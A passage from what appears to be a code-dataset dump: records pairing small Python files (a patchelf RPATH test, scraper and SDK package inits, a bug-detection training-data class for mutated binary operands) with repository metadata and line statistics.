["patchelf", "--force-rpath", "--set-rpath", "$ORIGIN", full_lib_name]
),
]
assert check_output.call_args_list == check_output_expected_args
assert check_call.call_args_list == check_call_expected_args
def test_append_rpath_ignore_relative(self, check_call, check_output, _):
patcher = Patchelf()
# When a library has an existing RPATH entry but it cannot be resolved
# to an absolute path, it is eliminated
existing_rpath = b"not/absolute"
check_output.return_value = existing_rpath
wheel_dir = "."
lib_name = "test.so"
full_lib_name = os.path.abspath(lib_name)
append_rpath_within_wheel(lib_name, "$ORIGIN", wheel_dir, patcher)
check_output_expected_args = [
call(["patchelf", "--print-rpath", full_lib_name])
]
# Then that entry is ignored when updating the RPATH
check_call_expected_args = [
call(["patchelf", "--remove-rpath", full_lib_name]),
call(
["patchelf", "--force-rpath", "--set-rpath", "$ORIGIN", full_lib_name]
),
]
assert check_output.call_args_list == check_output_expected_args
assert check_call.call_args_list == check_call_expected_args
| 40.103448 | 86 | 0.612425 | 540 | 4,652 | 4.925926 | 0.142593 | 0.073684 | 0.066165 | 0.069173 | 0.809023 | 0.792481 | 0.792481 | 0.792481 | 0.776316 | 0.776316 | 0 | 0 | 0.290198 | 4,652 | 115 | 87 | 40.452174 | 0.805572 | 0.10963 | 0 | 0.677083 | 0 | 0 | 0.145208 | 0.037754 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.041667 | false | 0 | 0.041667 | 0 | 0.09375 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7a0d4755742d3c57ea1bebff1a07e0e2429908b6 | 69 | py | Python | contesto/utils/lambda_object.py | kaktaktoa/contesto | c31d10959abf1397182c24216880c487d29ac184 | [
"MIT"
] | null | null | null | contesto/utils/lambda_object.py | kaktaktoa/contesto | c31d10959abf1397182c24216880c487d29ac184 | [
"MIT"
] | null | null | null | contesto/utils/lambda_object.py | kaktaktoa/contesto | c31d10959abf1397182c24216880c487d29ac184 | [
"MIT"
] | null | null | null | def LambdaObject():
return type('LambdaObject', (object,), {})()
| 23 | 48 | 0.623188 | 6 | 69 | 7.166667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144928 | 69 | 2 | 49 | 34.5 | 0.728814 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
e1350354e041c53cb2aafc1747d8dd85b1f91903 | 350 | py | Python | proboards_scraper/scraper/__init__.py | ScottMastro/proboards-scraper | d970ba14b3ab4ea0b210f4d78664be4a13ca442a | [
"MIT"
] | 2 | 2021-07-05T12:03:00.000Z | 2022-03-06T21:31:49.000Z | proboards_scraper/scraper/__init__.py | ScottMastro/proboards-scraper | d970ba14b3ab4ea0b210f4d78664be4a13ca442a | [
"MIT"
] | 17 | 2021-05-17T03:46:46.000Z | 2022-03-11T21:19:45.000Z | proboards_scraper/scraper/__init__.py | ScottMastro/proboards-scraper | d970ba14b3ab4ea0b210f4d78664be4a13ca442a | [
"MIT"
] | 2 | 2022-01-21T22:03:07.000Z | 2022-02-17T21:38:38.000Z | from .scrape import (
scrape_board, scrape_forum, scrape_poll, scrape_shoutbox,
scrape_smileys, scrape_thread, scrape_user, scrape_users,
)
from .utils import split_url
__all__ = [
"scrape_board", "scrape_forum", "scrape_poll", "scrape_shoutbox",
"scrape_smileys", "scrape_thread", "scrape_user", "scrape_users",
"split_url",
]
| 26.923077 | 69 | 0.731429 | 43 | 350 | 5.44186 | 0.348837 | 0.094017 | 0.145299 | 0.188034 | 0.786325 | 0.786325 | 0.786325 | 0.786325 | 0.786325 | 0.786325 | 0 | 0 | 0.148571 | 350 | 12 | 70 | 29.166667 | 0.785235 | 0 | 0 | 0 | 0 | 0 | 0.311429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e14113a4ab06ee975be83075712e9d1190dfcb4d | 45 | py | Python | models/ops/depthavgpooling/modules/__init__.py | E18301194/DepthAwareCNN | 8ae98f7f18b69f79e7df03397dec2543d3d0c8eb | [
"MIT"
] | 278 | 2018-05-09T03:08:56.000Z | 2022-03-10T08:05:10.000Z | models/ops/depthavgpooling/modules/__init__.py | jfzhang95/DepthAwareCNN | 2076c751279637f112d9ea9ce33459b6f3b20063 | [
"MIT"
] | 35 | 2018-05-31T15:42:44.000Z | 2022-03-17T09:36:13.000Z | models/ops/depthavgpooling/modules/__init__.py | jfzhang95/DepthAwareCNN | 2076c751279637f112d9ea9ce33459b6f3b20063 | [
"MIT"
] | 80 | 2018-06-03T10:04:48.000Z | 2022-03-05T12:57:31.000Z | from .depthavgpooling import Depthavgpooling
| 22.5 | 44 | 0.888889 | 4 | 45 | 10 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.97561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e1a000c7113a09deb6f5c8b378767f827a2d33ea | 190 | py | Python | postalcodes_ni/exceptions.py | oscarmcm/postalcodes-ni | adf04e73f076d2cefab71d8266d33e272eeb0af8 | [
"MIT"
] | 3 | 2019-03-28T16:14:13.000Z | 2019-03-28T17:16:22.000Z | postalcodes_ni/exceptions.py | oscarmcm/postalcodes-ni | adf04e73f076d2cefab71d8266d33e272eeb0af8 | [
"MIT"
] | null | null | null | postalcodes_ni/exceptions.py | oscarmcm/postalcodes-ni | adf04e73f076d2cefab71d8266d33e272eeb0af8 | [
"MIT"
] | null | null | null | class ISOCodeError(Exception):
""" Thrown when ISO code doesnt exists
"""
pass
class PostalCodeError(Exception):
""" Thrown when postal code doesnt exists
"""
pass
| 17.272727 | 45 | 0.652632 | 20 | 190 | 6.2 | 0.6 | 0.241935 | 0.306452 | 0.322581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.252632 | 190 | 10 | 46 | 19 | 0.873239 | 0.405263 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
becb55f399547d4b74117ed5e2f1d11d6c064bb0 | 39 | py | Python | scripts/generate_secret.py | rohittiwari07/coinculture | 57523a52c57ceb71b09a28a951f8ad61decf835d | [
"Apache-2.0"
] | null | null | null | scripts/generate_secret.py | rohittiwari07/coinculture | 57523a52c57ceb71b09a28a951f8ad61decf835d | [
"Apache-2.0"
] | null | null | null | scripts/generate_secret.py | rohittiwari07/coinculture | 57523a52c57ceb71b09a28a951f8ad61decf835d | [
"Apache-2.0"
] | null | null | null | import os
print(os.urandom(24).hex())
| 9.75 | 27 | 0.692308 | 7 | 39 | 3.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057143 | 0.102564 | 39 | 3 | 28 | 13 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
832ebfefe195e112cd9537b3795803a7dd82371e | 204 | py | Python | mara_storage/config.py | mara/mara-storage | ab3797bfe079dc24599e394660e47cf6fac63cc6 | [
"MIT"
] | null | null | null | mara_storage/config.py | mara/mara-storage | ab3797bfe079dc24599e394660e47cf6fac63cc6 | [
"MIT"
] | 1 | 2021-12-04T12:52:22.000Z | 2021-12-04T12:52:22.000Z | mara_storage/config.py | mara/mara-storage | ab3797bfe079dc24599e394660e47cf6fac63cc6 | [
"MIT"
] | 2 | 2021-09-21T15:44:42.000Z | 2022-02-22T17:16:08.000Z | """Configuration of storage connections"""
import mara_storage.storages
def storages() -> {str: mara_storage.storages.Storage}:
"""The list of storage connections to use, by alias"""
return {}
| 22.666667 | 58 | 0.710784 | 25 | 204 | 5.72 | 0.64 | 0.125874 | 0.27972 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161765 | 204 | 8 | 59 | 25.5 | 0.836257 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
8365bc936c324205b037b74a0af488e145590304 | 107 | py | Python | bostaSDK/pickup/delete/__init__.py | bostaapp/bosta-python | df3f48dafac49b2577669fd4d74a5e5e9d28f2c1 | [
"MIT"
] | null | null | null | bostaSDK/pickup/delete/__init__.py | bostaapp/bosta-python | df3f48dafac49b2577669fd4d74a5e5e9d28f2c1 | [
"MIT"
] | 1 | 2020-11-18T11:01:32.000Z | 2020-11-18T11:10:52.000Z | bostaSDK/pickup/delete/__init__.py | bostaapp/bosta-python | df3f48dafac49b2577669fd4d74a5e5e9d28f2c1 | [
"MIT"
] | null | null | null | from .DeletePickupRequest import DeletePickupRequest
from .DeletePickupResponse import DeletePickupResonse
| 35.666667 | 53 | 0.906542 | 8 | 107 | 12.125 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074766 | 107 | 2 | 54 | 53.5 | 0.979798 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
55c8c4438ce66b66ea540210ba98b38b413b2f7c | 16,635 | py | Python | python/LearningDataIncorrectBinaryOperand.py | mast-group/DeepSStuBs | ea6621f9678c1bf2110641e7794309b832f81e2f | [
"MIT"
] | 1 | 2020-08-17T02:23:10.000Z | 2020-08-17T02:23:10.000Z | python/LearningDataIncorrectBinaryOperand.py | mast-group/DeepSStuBs | ea6621f9678c1bf2110641e7794309b832f81e2f | [
"MIT"
] | null | null | null | python/LearningDataIncorrectBinaryOperand.py | mast-group/DeepSStuBs | ea6621f9678c1bf2110641e7794309b832f81e2f | [
"MIT"
] | null | null | null | '''
Created on Nov 13, 2017
@author: Michael Pradel
'''
import Util
from collections import namedtuple
import random
import numpy as np
from Util import clean_string
type_embedding_size = 5
node_type_embedding_size = 8 # if changing here, then also change in LearningDataBinOperator
class CodePiece(object):
def __init__(self, left, right, op, src):
self.left = left
self.right = right
self.op = op
self.src = src
def to_message(self):
return str(self.src) + " | " + str(self.left) + " | " + str(self.op) + " | " + str(self.right)
Operand = namedtuple('Operand', ['op', 'type'])
class LearningData(object):
def __init__(self):
self.file_to_operands = dict() # string to set of Operands
self.stats = {}
def resetStats(self):
self.stats = {}
def pre_scan(self, training_data_paths, validation_data_paths):
all_operators_set = set()
for bin_op in Util.DataReader(training_data_paths, False):
file = bin_op["src"].split(" : ")[0]
operands = self.file_to_operands.setdefault(file, dict())
# operands = self.file_to_operands.setdefault(file, set())
left_operand = Operand(bin_op["left"], bin_op["leftType"])
right_operand = Operand(bin_op["right"], bin_op["rightType"])
if not left_operand in operands: operands[left_operand] = bin_op["tokens"][:bin_op["opPosition"]]
if not right_operand in operands: operands[right_operand] = bin_op["tokens"][bin_op["opPosition"] + 1: ]
# operands.add(left_operand)
# operands.add(right_operand)
all_operators_set.add(bin_op["op"])
for bin_op in Util.DataReader(validation_data_paths, False):
file = bin_op["src"].split(" : ")[0]
operands = self.file_to_operands.setdefault(file, dict())
# operands = self.file_to_operands.setdefault(file, set())
left_operand = Operand(bin_op["left"], bin_op["leftType"])
right_operand = Operand(bin_op["right"], bin_op["rightType"])
if not left_operand in operands: operands[left_operand] = bin_op["tokens"][:bin_op["opPosition"]]
if not right_operand in operands: operands[right_operand] = bin_op["tokens"][bin_op["opPosition"] + 1: ]
# operands.add(left_operand)
# operands.add(right_operand)
all_operators_set.add(bin_op["op"])
self.all_operators = list(all_operators_set)
def mutate(self, bin_op):
mutated_bin_op = dict()
mutated_bin_op["left"] = bin_op["left"]
mutated_bin_op["right"] = bin_op["right"]
mutated_bin_op["op"] = bin_op["op"]
mutated_bin_op["leftType"] = bin_op["leftType"]
mutated_bin_op["rightType"] = bin_op["rightType"]
mutated_bin_op["parent"] = bin_op["parent"]
mutated_bin_op["grandParent"] = bin_op["grandParent"]
mutated_bin_op["src"] = bin_op["src"]
mutated_bin_op["opPosition"] = bin_op["opPosition"]
mutated_tokens = bin_op["tokens"].copy()
# find an alternative operand in the same file
replace_left = random.random() < 0.5
if replace_left:
to_replace_operand = mutated_bin_op["left"]
else:
to_replace_operand = mutated_bin_op["right"]
file = bin_op["src"].split(" : ")[0]
all_operands = self.file_to_operands[file].keys()
tries_left = 100
found = False
if len(all_operands) == 1:
return None
while (not found) and tries_left > 0:
other_operand = random.choice(list(all_operands))
# This if here is problematic if it is inh word2vec, because it only keeps operands in vocab
# if other_operand.op in name_to_vector and other_operand.op != to_replace_operand:
if other_operand.op != to_replace_operand:
found = True
tries_left -= 1
if not found:
# print('Did not find operand')
return None
if replace_left:
mutated_bin_op["left"] = other_operand.op
mutated_bin_op["leftType"] = other_operand.type
mutated_tokens = self.file_to_operands[file][other_operand] + bin_op["tokens"][bin_op["opPosition"]:]
else:
mutated_bin_op["right"] = other_operand.op
mutated_bin_op["rightType"] = other_operand.type
mutated_tokens = bin_op["tokens"][: bin_op["opPosition"] + 1] + self.file_to_operands[file][other_operand]
mutated_bin_op["tokens"] = mutated_tokens
return mutated_bin_op
def code_features(self, bin_op, embeddings_model, emb_model_type, type_to_vector, node_type_to_vector, code_pieces=None):
if emb_model_type == 'w2v' or emb_model_type == 'FastText':
if isinstance(bin_op, list):
feats = []
for bin_op_inst in bin_op:
x = self.code_features(bin_op_inst, embeddings_model, emb_model_type, type_to_vector, node_type_to_vector)
feats.append(x)
return feats
left = bin_op["left"]
right = bin_op["right"]
operator = bin_op["op"]
left_type = bin_op["leftType"]
right_type = bin_op["rightType"]
parent = bin_op["parent"]
grand_parent = bin_op["grandParent"]
src = bin_op["src"]
left_vector = embeddings_model.get_embedding(left)
right_vector = embeddings_model.get_embedding(right)
elif emb_model_type == 'ELMo':
if isinstance(bin_op, list):
feats = []
queries = []
extra_vecs = []
part_indices = []
for i, bin_op_inst in enumerate(bin_op):
extra_vecs.append(self._extra_feats(bin_op_inst, type_to_vector, node_type_to_vector))
query = bin_op_inst["tokens"]
max_query = 200
if len(query) > max_query:
# print(len(query))
query = query[:max_query]
queries.append(query)
# left_index = 0
# right_index =
part_indices.append([[i, 0], [i, int(bin_op_inst["opPosition"])], [i, int(bin_op_inst["opPosition"]) + 1]])
# query = self._to_ELMo_heuristic_query(bin_op_inst, embeddings_model)
# queries.append(query)
part_indices = np.array(part_indices)
embeds = embeddings_model.get_sequence_embeddings(queries)
return embeds, np.array(extra_vecs), part_indices
# for i in range(len(embeds)):
# vec = list(embeds[i].ravel())
# feats.append(vec + extra_vecs[i])
# return feats
else:
query = self._to_ELMo_heuristic_query(bin_op_inst, embeddings_model)
extra_vec = self._extra_feats(bin_op, type_to_vector, node_type_to_vector)
return embeddings_model.get_sequence_embeddings([query]), np.array(extra_vec)
# x = list(embeddings_model.get_sequence_embeddings([query]).ravel()) + extra_vec
# return x
elif emb_model_type == 'BPE':
if isinstance(bin_op, list):
feats = []
queries = []
extra_vecs = []
for bin_op_inst in bin_op:
extra_vecs.append(self._extra_feats(bin_op_inst, type_to_vector, node_type_to_vector))
query = self._to_ELMo_heuristic_query(bin_op_inst, embeddings_model)
queries.append(query)
embeds = embeddings_model.get_sequence_embeddings(queries)
for i in range(len(embeds)):
vec = list(embeds[i].ravel())
feats.append(vec + extra_vecs[i])
return feats
else:
query = self._to_ELMo_heuristic_query(bin_op_inst, embeddings_model)
extra_vec = self._extra_feats(bin_op, type_to_vector, node_type_to_vector)
x = list(embeddings_model.get_sequence_embeddings([query]).ravel()) + extra_vec
return x
else:
return None
operator_vector = [0] * len(self.all_operators)
operator_vector[self.all_operators.index(operator)] = 1
left_type_vector = type_to_vector.get(left_type, [0]*type_embedding_size)
right_type_vector = type_to_vector.get(right_type, [0]*type_embedding_size)
parent_vector = node_type_to_vector.get(parent, [0] * node_type_embedding_size)
grand_parent_vector = node_type_to_vector.get(grand_parent, [0] * node_type_embedding_size)
x = left_vector + right_vector + operator_vector + left_type_vector + \
right_type_vector + parent_vector + grand_parent_vector
if code_pieces != None:
code_pieces.append(CodePiece(right, left, operator, src))
return x
def _to_ELMo_heuristic_query(self, bin_op, embeddings_model):
left = bin_op["left"]
right = bin_op["right"]
operator = bin_op["op"]
query = '%s %s %s' % (clean_string(left), operator, clean_string(right))
return query.split()
def _extra_feats(self, bin_op, type_to_vector, node_type_to_vector):
operator = bin_op["op"]
left_type = bin_op["leftType"]
right_type = bin_op["rightType"]
parent = bin_op["parent"]
grand_parent = bin_op["grandParent"]
operator_vector = [0] * len(self.all_operators)
operator_vector[self.all_operators.index(operator)] = 1
left_type_vector = type_to_vector.get(left_type, [0]*type_embedding_size)
right_type_vector = type_to_vector.get(right_type, [0]*type_embedding_size)
parent_vector = node_type_to_vector.get(parent, [0] * node_type_embedding_size)
grand_parent_vector = node_type_to_vector.get(grand_parent, [0] * node_type_embedding_size)
return operator_vector + left_type_vector + right_type_vector + parent_vector + grand_parent_vector
def code_to_xy_FastText_pairs(self, bin_op, xs, ys, name_to_vector, type_to_vector, node_type_to_vector, code_pieces=None):
left = bin_op["left"]
right = bin_op["right"]
operator = bin_op["op"]
left_type = bin_op["leftType"]
right_type = bin_op["rightType"]
parent = bin_op["parent"]
grand_parent = bin_op["grandParent"]
src = bin_op["src"]
if not (left in name_to_vector):
left = 'UNK'
# return
if not (right in name_to_vector):
right = 'UNK'
# return
left_vector = list(name_to_vector[left])
right_vector = list(name_to_vector[right])
operator_vector = [0] * len(self.all_operators)
operator_vector[self.all_operators.index(operator)] = 1
left_type_vector = type_to_vector.get(left_type, [0]*type_embedding_size)
right_type_vector = type_to_vector.get(right_type, [0]*type_embedding_size)
parent_vector = node_type_to_vector[parent]
grand_parent_vector = node_type_to_vector[grand_parent]
# find an alternative operand in the same file
replace_left = random.random() < 0.5
if replace_left:
to_replace_operand = left
else:
to_replace_operand = right
file = src.split(" : ")[0]
all_operands = self.file_to_operands[file]
tries_left = 100
found = False
while (not found) and tries_left > 0:
other_operand = random.choice(list(all_operands))
if other_operand.op in name_to_vector and other_operand.op != to_replace_operand:
found = True
tries_left -= 1
if not found:
return
# for all xy-pairs: y value = probability that incorrect
x_correct = left_vector + right_vector + operator_vector + left_type_vector + right_type_vector + parent_vector + grand_parent_vector
y_correct = [0]
xs.append(x_correct)
ys.append(y_correct)
if code_pieces != None:
code_pieces.append(CodePiece(left, right, operator, src))
other_operand_vector = list(name_to_vector[other_operand.op])
other_operand_type_vector = type_to_vector[other_operand.type]
# replace one operand with the alternative one
if replace_left:
x_incorrect = other_operand_vector + right_vector + operator_vector + other_operand_type_vector + right_type_vector + parent_vector + grand_parent_vector
else:
x_incorrect = left_vector + other_operand_vector + operator_vector + right_type_vector + other_operand_type_vector + parent_vector + grand_parent_vector
y_incorrect = [1]
xs.append(x_incorrect)
ys.append(y_incorrect)
if code_pieces != None:
code_pieces.append(CodePiece(right, left, operator, src))
def code_to_xy_pairs(self, bin_op, xs, ys, name_to_vector, type_to_vector, node_type_to_vector, code_pieces=None):
left = bin_op["left"]
right = bin_op["right"]
operator = bin_op["op"]
left_type = bin_op["leftType"]
right_type = bin_op["rightType"]
parent = bin_op["parent"]
grand_parent = bin_op["grandParent"]
src = bin_op["src"]
if not (left in name_to_vector):
left = 'UNK'
# return
if not (right in name_to_vector):
right = 'UNK'
# return
left_vector = name_to_vector[left]
right_vector = name_to_vector[right]
operator_vector = [0] * len(self.all_operators)
operator_vector[self.all_operators.index(operator)] = 1
left_type_vector = type_to_vector.get(left_type, [0]*type_embedding_size)
right_type_vector = type_to_vector.get(right_type, [0]*type_embedding_size)
parent_vector = node_type_to_vector.get(parent, [0] * node_type_embedding_size)
grand_parent_vector = node_type_to_vector.get(grand_parent, [0] * node_type_embedding_size)
# find an alternative operand in the same file
replace_left = random.random() < 0.5
if replace_left:
to_replace_operand = left
else:
to_replace_operand = right
file = src.split(" : ")[0]
all_operands = self.file_to_operands[file]
tries_left = 100
found = False
while (not found) and tries_left > 0:
other_operand = random.choice(list(all_operands))
if other_operand.op in name_to_vector and other_operand.op != to_replace_operand:
found = True
tries_left -= 1
if not found:
return
# for all xy-pairs: y value = probability that incorrect
x_correct = left_vector + right_vector + operator_vector + left_type_vector + right_type_vector + parent_vector + grand_parent_vector
y_correct = [0]
xs.append(x_correct)
ys.append(y_correct)
if code_pieces != None:
code_pieces.append(CodePiece(left, right, operator, src))
other_operand_vector = name_to_vector[other_operand.op]
other_operand_type_vector = type_to_vector[other_operand.type]
# replace one operand with the alternative one
if replace_left:
x_incorrect = other_operand_vector + right_vector + operator_vector + other_operand_type_vector + right_type_vector + parent_vector + grand_parent_vector
else:
x_incorrect = left_vector + other_operand_vector + operator_vector + right_type_vector + other_operand_type_vector + parent_vector + grand_parent_vector
y_incorrect = [1]
xs.append(x_incorrect)
ys.append(y_incorrect)
if code_pieces != None:
code_pieces.append(CodePiece(right, left, operator, src))
def anomaly_score(self, y_prediction_orig, y_prediction_changed):
return y_prediction_orig
def normal_score(self, y_prediction_orig, y_prediction_changed):
return y_prediction_changed
| 44.242021 | 165 | 0.613766 | 2,072 | 16,635 | 4.564672 | 0.084459 | 0.060266 | 0.045676 | 0.028759 | 0.818038 | 0.78727 | 0.750159 | 0.720025 | 0.720025 | 0.707655 | 0 | 0.006116 | 0.292275 | 16,635 | 376 | 166 | 44.242021 | 0.797248 | 0.076285 | 0 | 0.671378 | 0 | 0 | 0.040191 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045936 | false | 0 | 0.017668 | 0.010601 | 0.130742 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
55f4cd07b7fde69aebc7a5ead510e1cd4ad0133e | 44 | py | Python | Vitis-AI-Quantizer/vai_q_pytorch/pytorch_binding/pytorch_nndct/nn/__init__.py | dendisuhubdy/Vitis-AI | 524f65224c52314155dafc011d488ed30e458fcb | [
"Apache-2.0"
] | 1 | 2021-04-01T06:38:48.000Z | 2021-04-01T06:38:48.000Z | Vitis-AI-Quantizer/vai_q_pytorch/pytorch_binding/pytorch_nndct/nn/__init__.py | dendisuhubdy/Vitis-AI | 524f65224c52314155dafc011d488ed30e458fcb | [
"Apache-2.0"
] | null | null | null | Vitis-AI-Quantizer/vai_q_pytorch/pytorch_binding/pytorch_nndct/nn/__init__.py | dendisuhubdy/Vitis-AI | 524f65224c52314155dafc011d488ed30e458fcb | [
"Apache-2.0"
] | null | null | null | from .modules import *
from .utils import *
| 14.666667 | 22 | 0.727273 | 6 | 44 | 5.333333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 44 | 2 | 23 | 22 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
36228be9485ecd40061323da030826d86967f4e0 | 107 | py | Python | kabuka/__main__.py | sdanaipat/kabuka | e9c9356d1d0987ff708c915133c8dd780302f5f4 | [
"MIT"
] | null | null | null | kabuka/__main__.py | sdanaipat/kabuka | e9c9356d1d0987ff708c915133c8dd780302f5f4 | [
"MIT"
] | null | null | null | kabuka/__main__.py | sdanaipat/kabuka | e9c9356d1d0987ff708c915133c8dd780302f5f4 | [
"MIT"
] | null | null | null | import fire
from kabuka import get_latest_price
if __name__ == '__main__':
fire.Fire(get_latest_price)
| 15.285714 | 35 | 0.785047 | 16 | 107 | 4.5 | 0.625 | 0.25 | 0.388889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140187 | 107 | 6 | 36 | 17.833333 | 0.782609 | 0 | 0 | 0 | 0 | 0 | 0.074766 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
364c84b276c07dd62723f4fa75f714a42d780b76 | 22 | py | Python | energyOptimal/sensors/rapl/__init__.py | VitorRamos/energy | 0b048b624cda2db4b9c2100508156679daacd61c | [
"MIT"
] | 1 | 2018-09-11T18:46:23.000Z | 2018-09-11T18:46:23.000Z | energyOptimal/sensors/rapl/__init__.py | VitorRamos/energy | 0b048b624cda2db4b9c2100508156679daacd61c | [
"MIT"
] | 4 | 2018-09-29T20:02:01.000Z | 2018-09-30T21:01:22.000Z | energyOptimal/sensors/rapl/__init__.py | VitorRamos/energy | 0b048b624cda2db4b9c2100508156679daacd61c | [
"MIT"
] | 1 | 2019-03-24T01:34:28.000Z | 2019-03-24T01:34:28.000Z | from .rapl import RAPL | 22 | 22 | 0.818182 | 4 | 22 | 4.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 22 | 1 | 22 | 22 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
364f8352237d28509f6842ec9b5f0fafb438bd25 | 34 | py | Python | embracenet_pytorch/__init__.py | idearibosome/embracenet | c61b63dadc6fc8d719bb77475f4734f62697144e | [
"MIT"
] | 73 | 2019-04-18T02:39:02.000Z | 2022-03-25T22:59:34.000Z | embracenet_tf2/__init__.py | Jaehoon9201/embracenet | c61b63dadc6fc8d719bb77475f4734f62697144e | [
"MIT"
] | null | null | null | embracenet_tf2/__init__.py | Jaehoon9201/embracenet | c61b63dadc6fc8d719bb77475f4734f62697144e | [
"MIT"
